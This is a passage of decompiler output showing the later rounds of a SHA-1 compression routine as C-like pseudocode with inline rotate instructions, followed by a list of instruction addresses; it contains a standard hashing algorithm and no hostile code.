				_t1258 = _t1255 + _t1522 + (_t1109 ^ _t1824 ^ _t1681) + _t1718 + 0x6ed9eba1;
				_t1720 =  *(_t1849 + 0x58);
				 *(_t1849 + 0x54) = _t1258;
				asm("rol ecx, 0x5");
				_t1526 =  *(_t1849 + 0x30) ^  *(_t1849 + 0x28) ^ _t845[0xa] ^ _t845[5];
				asm("rol edx, 1");
				_t845[0xd] = _t1526;
				asm("ror esi, 0x2");
				_t849 =  *(_t1849 + 0x68);
				_t1261 = _t1258 + _t1526 + (_t1109 ^ _t1824 ^ _t1720) + _t1681 + 0x6ed9eba1;
				_t1683 =  *(_t1849 + 0x54);
				 *(_t1849 + 0x58) = _t1261;
				asm("rol ecx, 0x5");
				_t1530 =  *_t849 ^  *(_t1849 + 0x2c) ^ _t849[0xb] ^ _t849[6];
				asm("rol edx, 1");
				_t849[0xe] = _t1530;
				asm("ror edi, 0x2");
				_t853 =  *(_t1849 + 0x68);
				_t1264 = _t1261 + _t1530 + (_t1824 ^ _t1720 ^ _t1683) + _t1109 + 0x6ed9eba1;
				_t1111 =  *(_t1849 + 0x58);
				 *(_t1849 + 0x54) = _t1264;
				asm("rol ecx, 0x5");
				_t1534 = _t853[1] ^  *(_t1849 + 0x30) ^ _t853[0xc] ^ _t853[7];
				asm("rol edx, 1");
				_t853[0xf] = _t1534;
				asm("ror ebx, 0x2");
				_t1825 =  *(_t1849 + 0x54);
				_t1267 = _t1824 + 0x6ed9eba1 + (_t1720 ^ _t1683 ^ _t1111) + _t1264 + _t1534;
				_t858 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x58) = _t1267;
				asm("rol ecx, 0x5");
				_t1538 = _t858[2] ^  *_t858 ^ _t858[0xd] ^ _t858[8];
				asm("rol edx, 1");
				 *_t858 = _t1538;
				_t862 =  *(_t1849 + 0x68);
				_t1270 = _t1267 + _t1538 + (_t1825 ^ _t1683 ^ _t1111) + _t1720 + 0x6ed9eba1;
				_t1722 =  *(_t1849 + 0x58);
				 *(_t1849 + 0x54) = _t1270;
				_t1542 =  *(_t1849 + 0x14) ^ _t862[1] ^ _t862[0xe] ^ _t862[9];
				asm("rol edx, 1");
				_t862[1] = _t1542;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				asm("ror esi, 0x2");
				_t866 =  *(_t1849 + 0x68);
				_t1273 = _t1270 + _t1542 + (_t1825 ^ _t1722 ^ _t1111) + _t1683 + 0x6ed9eba1;
				_t1685 =  *(_t1849 + 0x54);
				 *(_t1849 + 0x58) = _t1273;
				asm("rol ecx, 0x5");
				_t1546 =  *(_t1849 + 0x10) ^ _t866[2] ^ _t866[0xf] ^ _t866[0xa];
				asm("rol edx, 1");
				_t866[2] = _t1546;
				_t1274 =  *(_t1849 + 0x68);
				asm("ror edi, 0x2");
				_t1549 = _t1273 + _t1546 + (_t1825 ^ _t1722 ^ _t1685) + _t1111 + 0x6ed9eba1;
				_t873 =  *(_t1849 + 0x14) ^  *_t1274 ^ _t1274[0xb] ^ _t1274[5];
				_t1113 =  *(_t1849 + 0x58);
				asm("rol eax, 1");
				_t1274[3] = _t873;
				 *(_t1849 + 0x14) = _t873;
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t1277 =  *(_t1849 + 0x68);
				_t1827 = _t1825 + 0x6ed9eba1 + (_t1722 ^ _t1685 ^ _t1113) + _t1549 +  *(_t1849 + 0x14);
				_t881 =  *(_t1849 + 0x10) ^ _t1277[1] ^ _t1277[0xc] ^ _t1277[6];
				asm("rol eax, 1");
				_t1277[4] = _t881;
				 *(_t1849 + 0x10) = _t881;
				asm("rol ecx, 0x5");
				asm("ror edx, 0x2");
				_t885 =  *(_t1849 + 0x68);
				_t1281 = _t1827 +  *(_t1849 + 0x10) + (_t1685 ^ _t1113 ^ _t1549) + _t1722 + 0x6ed9eba1;
				 *(_t1849 + 0x58) = _t1549;
				 *(_t1849 + 0x54) = _t1281;
				_t1553 = _t885[2] ^ _t885[0xd] ^ _t885[7] ^ _t885[5];
				_t1724 =  *(_t1849 + 0x58);
				asm("rol edx, 1");
				_t885[5] = _t1553;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				_t1284 = _t1281 + _t1553 + (_t1827 ^ _t1113 ^ _t1724) + _t1685 + 0x6ed9eba1;
				_t1687 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x58) = _t1284;
				asm("rol ecx, 0x5");
				_t889 = _t1687[3];
				_t1557 = _t889 ^ _t1687[0xe] ^ _t1687[8] ^ _t1687[6];
				 *(_t1849 + 0x14) = _t889;
				asm("rol edx, 1");
				_t1687[6] = _t1557;
				_t1688 =  *(_t1849 + 0x54);
				asm("ror edi, 0x2");
				_t894 = (_t1827 ^ _t1688 ^ _t1724) + _t1284 + _t1557 + _t1113 + 0x6ed9eba1;
				_t1115 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x48) = _t894;
				_t1286 = _t1115[4];
				_t1561 = _t1286 ^ _t1115[0xf] ^ _t1115[9] ^ _t1115[7];
				 *(_t1849 + 0x3c) = _t1286;
				asm("rol ecx, 0x5");
				asm("rol edx, 1");
				_t1115[7] = _t1561;
				_t1116 =  *(_t1849 + 0x58);
				asm("ror ebx, 0x2");
				_t1289 =  *(_t1849 + 0x68);
				_t899 = (_t1827 ^ _t1688 ^ _t1116) + _t894 + _t1561 + _t1724 + 0x6ed9eba1;
				 *(_t1849 + 0x44) = _t899;
				asm("rol edx, 0x5");
				_t1729 =  *_t1289 ^ _t1289[0xa] ^ _t1289[8] ^ _t1289[5];
				asm("rol esi, 1");
				_t1289[8] = _t1729;
				_t1828 =  *(_t1849 + 0x48);
				_t903 = _t899 - 0x70e44324 + ((_t1116 |  *(_t1849 + 0x48)) & _t1688 | _t1116 &  *(_t1849 + 0x48)) + _t1729 + _t1827;
				asm("ror ebp, 0x2");
				_t1296 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x50) = _t903;
				_t1733 = _t1296[1] ^ _t1296[0xb] ^ _t1296[9] ^ _t1296[6];
				asm("rol esi, 1");
				_t1296[9] = _t1733;
				asm("rol edx, 0x5");
				_t1689 =  *(_t1849 + 0x44);
				asm("ror edi, 0x2");
				_t907 = _t903 - 0x70e44324 + ((_t1828 |  *(_t1849 + 0x44)) & _t1116 | _t1828 &  *(_t1849 + 0x44)) + _t1733 + _t1688;
				_t1303 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x48) = _t907;
				asm("rol edx, 0x5");
				_t1737 = _t1303[2] ^ _t1303[0xc] ^ _t1303[0xa] ^ _t1303[7];
				asm("rol esi, 1");
				_t1303[0xa] = _t1737;
				_t1117 =  *(_t1849 + 0x50);
				_t911 = _t907 - 0x70e44324 + (( *(_t1849 + 0x50) | _t1689) & _t1828 |  *(_t1849 + 0x50) & _t1689) + _t1737 + _t1116;
				asm("ror ebx, 0x2");
				_t1310 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x44) = _t911;
				asm("rol edx, 0x5");
				_t1741 =  *(_t1849 + 0x14) ^ _t1310[0xd] ^ _t1310[0xb] ^ _t1310[8];
				asm("rol esi, 1");
				_t1310[0xb] = _t1741;
				_t1829 =  *(_t1849 + 0x48);
				_t915 = _t911 - 0x70e44324 + ((_t1117 |  *(_t1849 + 0x48)) & _t1689 | _t1117 &  *(_t1849 + 0x48)) + _t1741 + _t1828;
				asm("ror ebp, 0x2");
				_t1317 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x40) = _t915;
				asm("rol edx, 0x5");
				_t1745 =  *(_t1849 + 0x3c) ^ _t1317[0xe] ^ _t1317[0xc] ^ _t1317[9];
				asm("rol esi, 1");
				_t1317[0xc] = _t1745;
				_t919 = _t915 - 0x70e44324 + ((_t1829 |  *(_t1849 + 0x44)) & _t1117 | _t1829 &  *(_t1849 + 0x44)) + _t1745 + _t1689;
				_t1690 =  *(_t1849 + 0x44);
				_t1324 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x48) = _t919;
				asm("ror edi, 0x2");
				asm("rol edx, 0x5");
				_t1749 = _t1324[0xf] ^ _t1324[0xd] ^ _t1324[0xa] ^ _t1324[5];
				asm("rol esi, 1");
				_t1324[0xd] = _t1749;
				_t1118 =  *(_t1849 + 0x40);
				_t923 = _t919 - 0x70e44324 + ((_t1690 |  *(_t1849 + 0x40)) & _t1829 | _t1690 &  *(_t1849 + 0x40)) + _t1749 + _t1117;
				asm("ror ebx, 0x2");
				_t1331 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x50) = _t923;
				asm("rol edx, 0x5");
				_t1753 =  *_t1331 ^ _t1331[0xe] ^ _t1331[0xb] ^ _t1331[6];
				asm("rol esi, 1");
				_t1331[0xe] = _t1753;
				_t1830 =  *(_t1849 + 0x48);
				_t927 = _t923 - 0x70e44324 + ((_t1118 |  *(_t1849 + 0x48)) & _t1690 | _t1118 &  *(_t1849 + 0x48)) + _t1753 + _t1829;
				asm("ror ebp, 0x2");
				_t1338 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x44) = _t927;
				asm("rol edx, 0x5");
				_t1757 = _t1338[1] ^ _t1338[0xf] ^ _t1338[0xc] ^ _t1338[7];
				asm("rol esi, 1");
				_t1338[0xf] = _t1757;
				_t1691 =  *(_t1849 + 0x50);
				_t931 = _t927 - 0x70e44324 + (( *(_t1849 + 0x50) | _t1830) & _t1118 |  *(_t1849 + 0x50) & _t1830) + _t1757 + _t1690;
				asm("ror edi, 0x2");
				_t1345 =  *(_t1849 + 0x68);
				asm("rol edx, 0x5");
				 *(_t1849 + 0x48) = _t931;
				_t1761 = _t1345[2] ^  *_t1345 ^ _t1345[0xd] ^ _t1345[8];
				asm("rol esi, 1");
				 *_t1345 = _t1761;
				_t1119 =  *(_t1849 + 0x44);
				_t935 = _t931 - 0x70e44324 + ((_t1691 |  *(_t1849 + 0x44)) & _t1830 | _t1691 &  *(_t1849 + 0x44)) + _t1761 + _t1118;
				asm("ror ebx, 0x2");
				_t1352 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x40) = _t935;
				asm("rol edx, 0x5");
				_t1765 =  *(_t1849 + 0x14) ^ _t1352[1] ^ _t1352[0xe] ^ _t1352[9];
				asm("rol esi, 1");
				_t1352[1] = _t1765;
				_t1831 =  *(_t1849 + 0x48);
				_t939 = _t935 - 0x70e44324 + ((_t1119 |  *(_t1849 + 0x48)) & _t1691 | _t1119 &  *(_t1849 + 0x48)) + _t1765 + _t1830;
				asm("ror ebp, 0x2");
				_t1359 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x50) = _t939;
				asm("rol edx, 0x5");
				_t1769 =  *(_t1849 + 0x3c) ^ _t1359[2] ^ _t1359[0xf] ^ _t1359[0xa];
				asm("rol esi, 1");
				_t1359[2] = _t1769;
				_t1573 =  *(_t1849 + 0x68);
				_t1692 =  *(_t1849 + 0x40);
				_t943 = _t939 - 0x70e44324 + ((_t1831 |  *(_t1849 + 0x40)) & _t1119 | _t1831 &  *(_t1849 + 0x40)) + _t1769 + _t1691;
				_t1369 =  *(_t1849 + 0x14) ^  *_t1573 ^ _t1573[0xb] ^ _t1573[5];
				asm("rol ecx, 1");
				_t1573[3] = _t1369;
				 *(_t1849 + 0x14) = _t1369;
				asm("ror edi, 0x2");
				 *(_t1849 + 0x4c) = _t943;
				asm("rol edx, 0x5");
				_t1120 =  *(_t1849 + 0x50);
				asm("ror ebx, 0x2");
				_t947 = _t943 - 0x70e44324 + ((_t1692 |  *(_t1849 + 0x50)) & _t1831 | _t1692 &  *(_t1849 + 0x50)) +  *(_t1849 + 0x14) + _t1119;
				_t1376 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x48) = _t947;
				_t1773 =  *(_t1849 + 0x3c) ^ _t1376[1] ^ _t1376[0xc] ^ _t1376[6];
				asm("rol esi, 1");
				_t1376[4] = _t1773;
				asm("rol edx, 0x5");
				_t1380 =  *(_t1849 + 0x68);
				_t1833 =  *(_t1849 + 0x4c);
				_t953 = ( *(_t1849 + 0x4c) & _t1120 | ( *(_t1849 + 0x4c) | _t1120) & _t1692) + _t1773 + _t1831 + 0x8f1bbcdc + _t947;
				asm("ror ebp, 0x2");
				_t1777 = _t1380[2] ^ _t1380[0xd] ^ _t1380[7] ^ _t1380[5];
				asm("rol esi, 1");
				_t1380[5] = _t1777;
				 *(_t1849 + 0x44) = _t953;
				asm("rol edx, 0x5");
				_t1577 =  *(_t1849 + 0x68);
				_t957 = _t953 - 0x70e44324 + ((_t1833 |  *(_t1849 + 0x48)) & _t1120 | _t1833 &  *(_t1849 + 0x48)) + _t1777 + _t1692;
				_t1693 =  *(_t1849 + 0x48);
				 *(_t1849 + 0x14) = _t957;
				asm("ror edi, 0x2");
				_t1387 = _t1577[3];
				_t1781 = _t1387 ^ _t1577[0xe] ^ _t1577[8] ^ _t1577[6];
				 *(_t1849 + 0x18) = _t1387;
				asm("rol esi, 1");
				_t1577[6] = _t1781;
				asm("rol edx, 0x5");
				_t1579 =  *(_t1849 + 0x68);
				_t961 = _t957 - 0x70e44324 + ((_t1693 |  *(_t1849 + 0x44)) & _t1833 | _t1693 &  *(_t1849 + 0x44)) + _t1781 + _t1120;
				_t1121 =  *(_t1849 + 0x44);
				asm("ror ebx, 0x2");
				 *(_t1849 + 0x10) = _t961;
				_t1394 = _t1579[4];
				_t1785 = _t1394 ^ _t1579[0xf] ^ _t1579[9] ^ _t1579[7];
				 *(_t1849 + 0x1c) = _t1394;
				asm("rol esi, 1");
				_t1579[7] = _t1785;
				asm("rol edx, 0x5");
				_t964 =  *(_t1849 + 0x14);
				asm("ror eax, 0x2");
				 *(_t1849 + 0x14) = _t964;
				_t1835 = _t961 - 0x70e44324 + ((_t1121 |  *(_t1849 + 0x14)) & _t1693 | _t1121 &  *(_t1849 + 0x14)) + _t1785 + _t1833;
				_t1401 =  *(_t1849 + 0x68);
				asm("rol edx, 0x5");
				_t1789 =  *_t1401 ^ _t1401[0xa] ^ _t1401[8] ^ _t1401[5];
				asm("rol esi, 1");
				_t1401[8] = _t1789;
				_t966 =  *(_t1849 + 0x10);
				asm("ror eax, 0x2");
				 *(_t1849 + 0x10) = _t966;
				_t1695 = _t1835 - 0x70e44324 + ((_t964 |  *(_t1849 + 0x10)) & _t1121 | _t964 &  *(_t1849 + 0x10)) + _t1789 + _t1693;
				_t1408 =  *(_t1849 + 0x68);
				asm("rol edx, 0x5");
				_t1793 = _t1408[1] ^ _t1408[0xb] ^ _t1408[9] ^ _t1408[6];
				asm("rol esi, 1");
				_t1408[9] = _t1793;
				asm("ror ebp, 0x2");
				_t969 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x50) = _t1835;
				_t1123 = _t1695 - 0x70e44324 + ((_t1835 | _t966) &  *(_t1849 + 0x14) | _t1835 &  *(_t1849 + 0x10)) + _t1793 + _t1121;
				_t1797 = _t969[2] ^ _t969[0xc] ^ _t969[0xa] ^ _t969[7];
				asm("rol esi, 1");
				_t969[0xa] = _t1797;
				_t1801 =  *(_t1849 + 0x18) ^ _t969[0xd] ^ _t969[0xb] ^ _t969[8];
				asm("rol edx, 0x5");
				asm("ror edi, 0x2");
				asm("rol esi, 1");
				 *(_t1849 + 0x58) = _t1695;
				_t969[0xb] = _t1801;
				_t1838 = _t1123 - 0x70e44324 + ((_t1835 | _t1695) &  *(_t1849 + 0x10) | _t1835 & _t1695) + _t1797 +  *(_t1849 + 0x14);
				asm("rol edx, 0x5");
				asm("ror ebx, 0x2");
				 *(_t1849 + 0x54) = _t1123;
				_t972 =  *(_t1849 + 0x68);
				_t1803 = _t1838 - 0x70e44324 + ((_t1695 | _t1123) &  *(_t1849 + 0x50) | _t1695 & _t1123) + _t1801 +  *(_t1849 + 0x10);
				_t1588 =  *(_t1849 + 0x1c) ^ _t972[0xe] ^ _t972[0xc] ^ _t972[9];
				asm("rol edx, 1");
				_t972[0xc] = _t1588;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				 *(_t1849 + 0x50) = _t1838;
				_t1428 =  *(_t1849 + 0x68);
				_t1697 = _t1803 - 0x359d3e2a + (_t1695 ^ _t1123 ^ _t1838) + _t1588 +  *(_t1849 + 0x50);
				_t978 = _t1428[0xa];
				_t1592 = _t1428[0xf] ^ _t1428[0xd] ^ _t978 ^ _t1428[5];
				asm("rol edx, 1");
				_t1428[0xd] = _t1592;
				 *(_t1849 + 0x44) = _t978;
				asm("rol ecx, 0x5");
				asm("ror esi, 0x2");
				_t1430 =  *(_t1849 + 0x68);
				_t1125 = _t1697 - 0x359d3e2a + (_t1123 ^ _t1838 ^ _t1803) + _t1592 +  *(_t1849 + 0x58);
				_t984 = _t1430[0xb];
				_t1596 =  *_t1430 ^ _t1430[0xe] ^ _t984 ^ _t1430[6];
				asm("rol edx, 1");
				_t1430[0xe] = _t1596;
				 *(_t1849 + 0x40) = _t984;
				asm("rol ecx, 0x5");
				asm("ror edi, 0x2");
				_t1432 =  *(_t1849 + 0x68);
				_t1840 = _t1125 - 0x359d3e2a + (_t1697 ^ _t1838 ^ _t1803) + _t1596 +  *(_t1849 + 0x54);
				_t990 = _t1432[0xc];
				_t1600 = _t1432[1] ^ _t1432[0xf] ^ _t990 ^ _t1432[7];
				 *(_t1849 + 0x4c) = _t990;
				asm("rol edx, 1");
				_t1432[0xf] = _t1600;
				asm("rol ecx, 0x5");
				_t1602 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x50) = _t1840 + (_t1697 ^ _t1125 ^ _t1803) + _t1600 + 0xca62c1d6 +  *(_t1849 + 0x50);
				_t1435 =  *(_t1849 + 0x68);
				asm("ror ebx, 0x2");
				_t996 = _t1602[0xd];
				 *(_t1849 + 0x48) = _t996;
				_t997 = _t1435;
				asm("rol ecx, 0x5");
				_t1606 = _t1602[2] ^  *_t1435 ^ _t996 ^ _t997[8];
				asm("rol edx, 1");
				 *_t997 = _t1606;
				asm("ror ebp, 0x2");
				_t1804 =  *(_t1849 + 0x50);
				_t1438 =  *(_t1849 + 0x50) + 0xca62c1d6 + (_t1697 ^ _t1125 ^ _t1840) + _t1606 + _t1803;
				_t1003 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x58) = _t1438;
				asm("rol ecx, 0x5");
				_t1610 =  *(_t1849 + 0x18) ^ _t1003[1] ^ _t1003[0xe] ^ _t1003[9];
				asm("rol edx, 1");
				_t1003[1] = _t1610;
				asm("ror esi, 0x2");
				_t1699 =  *(_t1849 + 0x58);
				_t1439 = _t1438 + (_t1125 ^ _t1840 ^ _t1804) + _t1610 + _t1697 + 0xca62c1d6;
				_t1009 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x54) = _t1439;
				asm("rol ecx, 0x5");
				_t1614 =  *(_t1849 + 0x1c) ^ _t1009[2] ^ _t1009[0xf] ^ _t1009[0xa];
				asm("rol edx, 1");
				_t1009[2] = _t1614;
				asm("ror edi, 0x2");
				_t1440 =  *(_t1849 + 0x68);
				_t1126 =  *(_t1849 + 0x54);
				_t1616 = _t1439 - 0x359d3e2a + (_t1840 ^ _t1804 ^ _t1699) + _t1614 + _t1125;
				_t1018 =  *(_t1849 + 0x18) ^  *_t1440 ^ _t1440[0xb] ^ _t1440[5];
				asm("rol eax, 1");
				_t1440[3] = _t1018;
				 *(_t1849 + 0x18) = _t1018;
				asm("rol ecx, 0x5");
				_t1842 = _t1616 - 0x359d3e2a + (_t1126 ^ _t1804 ^ _t1699) +  *(_t1849 + 0x18) + _t1840;
				asm("ror ebx, 0x2");
				_t1025 = ( *(_t1849 + 0x68))[1];
				 *(_t1849 + 0x2c) = _t1025;
				_t1026 =  *(_t1849 + 0x68);
				_t1445 =  *(_t1849 + 0x1c) ^ _t1025 ^ _t1026[0xc] ^ _t1026[6];
				asm("rol ecx, 1");
				_t1026[4] = _t1445;
				 *(_t1849 + 0x1c) = _t1445;
				asm("ror edx, 0x2");
				 *(_t1849 + 0x58) = _t1616;
				_t1805 =  *(_t1849 + 0x58);
				asm("rol ecx, 0x5");
				_t1032 = (_t1126 ^ _t1616 ^ _t1699) +  *(_t1849 + 0x1c) + _t1804 + _t1842 + 0xca62c1d6;
				_t1448 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x30) = _t1032;
				_t1620 = _t1448[2] ^ _t1448[0xd] ^ _t1448[7] ^ _t1448[5];
				asm("rol edx, 1");
				_t1448[5] = _t1620;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				 *(_t1849 + 0x58) = _t1842;
				_t1700 =  *(_t1849 + 0x68);
				_t1038 = (_t1126 ^ _t1805 ^ _t1842) + _t1620 + _t1699 + _t1032 + 0xca62c1d6;
				 *(_t1849 + 0x14) = _t1038;
				asm("rol ecx, 0x5");
				_t1624 = _t1700[3] ^ _t1700[0xe] ^ _t1700[8] ^ _t1700[6];
				asm("rol edx, 1");
				_t1700[6] = _t1624;
				_t1844 = _t1038 - 0x359d3e2a + (_t1805 ^ _t1842 ^  *(_t1849 + 0x30)) + _t1624 + _t1126;
				_t1044 = _t1700;
				_t1127 =  *(_t1849 + 0x30);
				_t1628 = _t1700[4] ^ _t1700[0xf] ^ _t1700[9] ^ _t1700[7];
				asm("ror ebx, 0x2");
				 *(_t1849 + 0x30) = _t1127;
				asm("ror dword [esp+0x14], 0x2");
				asm("rol edx, 1");
				_t1700[7] = _t1628;
				asm("rol ecx, 0x5");
				_t1132 = (_t1127 ^  *(_t1849 + 0x58) ^  *(_t1849 + 0x14)) + _t1628 + _t1805 + 0xca62c1d6 + _t1844;
				_t1632 =  *_t1044 ^ _t1044[0xa] ^ _t1044[8] ^ _t1044[5];
				asm("rol edx, 1");
				_t1044[8] = _t1632;
				asm("rol edi, 0x5");
				_t1702 = _t1132 + (_t1844 ^  *(_t1849 + 0x30) ^  *(_t1849 + 0x14)) + _t1632 + 0xca62c1d6 +  *(_t1849 + 0x58);
				_t1050 =  *(_t1849 + 0x68);
				asm("ror ebp, 0x2");
				asm("rol esi, 0x5");
				 *(_t1849 + 0x58) = _t1844;
				_t1637 =  *(_t1849 + 0x2c) ^ _t1050[0xb] ^ _t1050[9] ^ _t1050[6];
				asm("rol edx, 1");
				_t1050[9] = _t1637;
				asm("ror ebx, 0x2");
				 *(_t1849 + 0x54) = _t1132;
				_t1808 = _t1702 + (_t1844 ^ _t1132 ^  *(_t1849 + 0x14)) + _t1637 + 0xca62c1d6 +  *(_t1849 + 0x30);
				_t1056 =  *(_t1849 + 0x68);
				asm("rol ecx, 0x5");
				_t1642 = _t1056[2] ^  *(_t1849 + 0x4c) ^  *(_t1849 + 0x44) ^ _t1056[7];
				asm("rol edx, 1");
				_t1056[0xa] = _t1642;
				asm("ror edi, 0x2");
				 *(_t1849 + 0x50) = _t1702;
				_t1846 = _t1808 - 0x359d3e2a + (_t1844 ^ _t1132 ^ _t1702) + _t1642 +  *(_t1849 + 0x14);
				_t1062 =  *(_t1849 + 0x68);
				asm("rol ecx, 0x5");
				_t1646 = _t1062[3] ^  *(_t1849 + 0x48) ^  *(_t1849 + 0x40) ^ _t1062[8];
				asm("rol edx, 1");
				_t1062[0xb] = _t1646;
				asm("ror esi, 0x2");
				_t1134 = _t1846 - 0x359d3e2a + (_t1132 ^ _t1702 ^ _t1808) + _t1646 +  *(_t1849 + 0x58);
				 *(_t1849 + 0x58) = _t1808;
				_t1068 =  *(_t1849 + 0x68);
				asm("rol ecx, 0x5");
				_t1650 = _t1068[9] ^ _t1068[4] ^ _t1068[0xe] ^  *(_t1849 + 0x4c);
				asm("rol edx, 1");
				_t1068[0xc] = _t1650;
				asm("ror ebp, 0x2");
				_t1704 = _t1134 - 0x359d3e2a + (_t1702 ^ _t1808 ^ _t1846) + _t1650 +  *(_t1849 + 0x54);
				_t1074 =  *(_t1849 + 0x68);
				asm("rol ecx, 0x5");
				_t1654 = _t1074[0xa] ^ _t1074[0xf] ^  *(_t1849 + 0x48) ^ _t1074[5];
				asm("rol edx, 1");
				_t1074[0xd] = _t1654;
				asm("ror ebx, 0x2");
				_t1810 = _t1704 - 0x359d3e2a + (_t1134 ^ _t1808 ^ _t1846) + _t1654 +  *(_t1849 + 0x50);
				_t1080 =  *(_t1849 + 0x68);
				asm("rol ecx, 0x5");
				_t1658 = _t1080[0xb] ^  *_t1080 ^ _t1080[0xe] ^ _t1080[6];
				asm("rol edx, 1");
				_t1080[0xe] = _t1658;
				asm("ror edi, 0x2");
				_t1458 =  *(_t1849 + 0x68);
				_t1660 = _t1810 - 0x359d3e2a + (_t1134 ^ _t1704 ^ _t1846) + _t1658 +  *(_t1849 + 0x58);
				_t1089 =  *(_t1849 + 0x2c) ^ _t1458[0xf] ^ _t1458[7] ^ _t1458[0xc];
				asm("rol eax, 1");
				_t1458[0xf] = _t1089;
				 *(_t1849 + 0x2c) = _t1089;
				asm("rol ecx, 0x5");
				_t1094 = (_t1134 ^ _t1704 ^ _t1810) +  *(_t1849 + 0x2c) + _t1660 + _t1846 + 0xca62c1d6;
				asm("ror esi, 0x2");
				_t1461 =  *((intOrPtr*)(_t1849 + 0x60));
				 *((intOrPtr*)(_t1461 + 0xc)) =  *((intOrPtr*)(_t1461 + 0xc)) + _t1704;
				 *((intOrPtr*)(_t1461 + 8)) =  *((intOrPtr*)(_t1461 + 8)) + _t1810;
				 *_t1461 =  *_t1461 + _t1094;
				 *((intOrPtr*)(_t1461 + 4)) =  *((intOrPtr*)(_t1461 + 4)) + _t1660;
				 *((intOrPtr*)(_t1461 + 0x10)) =  *((intOrPtr*)(_t1461 + 0x10)) + _t1134;
				return _t1094;
			}

0x0040b2e7
0x0040b2f0
0x0040b307
0x0040b30b
0x0040b2f2
0x0040b2f9
0x0040b2fe
0x0040b302
0x0040b302
0x0040b313
0x0040b317
0x0040b31f
0x0040b32a
0x0040b32f
0x0040b333
0x0040b337
0x0040b33f
0x0040b345
0x0040b351
0x0040b35c
0x0040b36d
0x0040b375
0x0040b384
0x0040b38e
0x0040b39d
0x0040b3a0
0x0040b3ab
0x0040b3ae
0x0040b3c0
0x0040b3ca
0x0040b3d5
0x0040b3d8
0x0040b3e3
0x0040b3e6
0x0040b3f8
0x0040b3fe
0x0040b411
0x0040b41c
0x0040b427
0x0040b42a
0x0040b43e
0x0040b446
0x0040b451
0x0040b454
0x0040b45f
0x0040b462
0x0040b474
0x0040b47e
0x0040b489
0x0040b492
0x0040b49d
0x0040b4a0
0x0040b4b2
0x0040b4bc
0x0040b4c7
0x0040b4d0
0x0040b4db
0x0040b4de
0x0040b4f0
0x0040b4f6
0x0040b50b
0x0040b50e
0x0040b519
0x0040b521
0x0040b530
0x0040b538
0x0040b543
0x0040b54c
0x0040b557
0x0040b55f
0x0040b56c
0x0040b578
0x0040b581
0x0040b590
0x0040b59b
0x0040b59e
0x0040b5b2
0x0040b5ba
0x0040b5c5
0x0040b5cc
0x0040b5ce
0x0040b5d2
0x0040b5d5
0x0040b5de
0x0040b5e1
0x0040b5ef
0x0040b5f3
0x0040b5ff
0x0040b604
0x0040b612
0x0040b61a
0x0040b623
0x0040b62b
0x0040b63a
0x0040b644
0x0040b651
0x0040b653
0x0040b658
0x0040b65c
0x0040b664
0x0040b66c
0x0040b675
0x0040b67b
0x0040b685
0x0040b698
0x0040b69c
0x0040b6a5
0x0040b6a8
0x0040b6ab
0x0040b6b9
0x0040b6bf
0x0040b6c9
0x0040b6dc
0x0040b6e0
0x0040b6e7
0x0040b6ea
0x0040b6f8
0x0040b6fe
0x0040b703
0x0040b725
0x0040b727
0x0040b731
0x0040b733
0x0040b738
0x0040b73b
0x0040b751
0x0040b765
0x0040b767
0x0040b769
0x0040b76e
0x0040b771
0x0040b788
0x0040b78c
0x0040b7a2
0x0040b7a4
0x0040b7a6
0x0040b7a9
0x0040b7ae
0x0040b7bf
0x0040b7ce
0x0040b7d0
0x0040b7da
0x0040b7de
0x0040b7e0
0x0040b7e5
0x0040b7e9
0x0040b7fe
0x0040b803
0x0040b807
0x0040b814
0x0040b818
0x0040b81a
0x0040b81f
0x0040b827
0x0040b838
0x0040b83b
0x0040b83d
0x0040b841
0x0040b847
0x0040b855
0x0040b859
0x0040b85b
0x0040b86e
0x0040b873
0x0040b877
0x0040b879
0x0040b886
0x0040b88a
0x0040b88c
0x0040b891
0x0040b89b
0x0040b8a8
0x0040b8ad
0x0040b8b1
0x0040b8b3
0x0040b8c0
0x0040b8c4
0x0040b8c6
0x0040b8cc
0x0040b8d5
0x0040b8ec
0x0040b8ef
0x0040b8f1
0x0040b8f5
0x0040b8f9
0x0040b906
0x0040b909
0x0040b90b
0x0040b91c
0x0040b921
0x0040b925
0x0040b927
0x0040b92b
0x0040b92f
0x0040b93d
0x0040b940
0x0040b942
0x0040b953
0x0040b958
0x0040b95c
0x0040b95e
0x0040b962
0x0040b966
0x0040b974
0x0040b977
0x0040b979
0x0040b992
0x0040b995
0x0040b999
0x0040b99b
0x0040b99f
0x0040b9a3
0x0040b9a6
0x0040b9a9
0x0040b9ab
0x0040b9c4
0x0040b9c7
0x0040b9cd
0x0040b9cf
0x0040b9d3
0x0040b9d7
0x0040b9da
0x0040b9e4
0x0040b9e6
0x0040b9ed
0x0040b9f2
0x0040ba01
0x0040ba05
0x0040ba07
0x0040ba11
0x0040ba15
0x0040ba1b
0x0040ba1e
0x0040ba20
0x0040ba31
0x0040ba36
0x0040ba3a
0x0040ba3c
0x0040ba40
0x0040ba44
0x0040ba50
0x0040ba53
0x0040ba55
0x0040ba60
0x0040ba65
0x0040ba69
0x0040ba6b
0x0040ba6f
0x0040ba73
0x0040ba80
0x0040ba83
0x0040ba85
0x0040ba90
0x0040ba9b
0x0040ba9f
0x0040baa1
0x0040baa5
0x0040baa9
0x0040bab4
0x0040bab7
0x0040bab9
0x0040bac5
0x0040bad3
0x0040bad5
0x0040badf
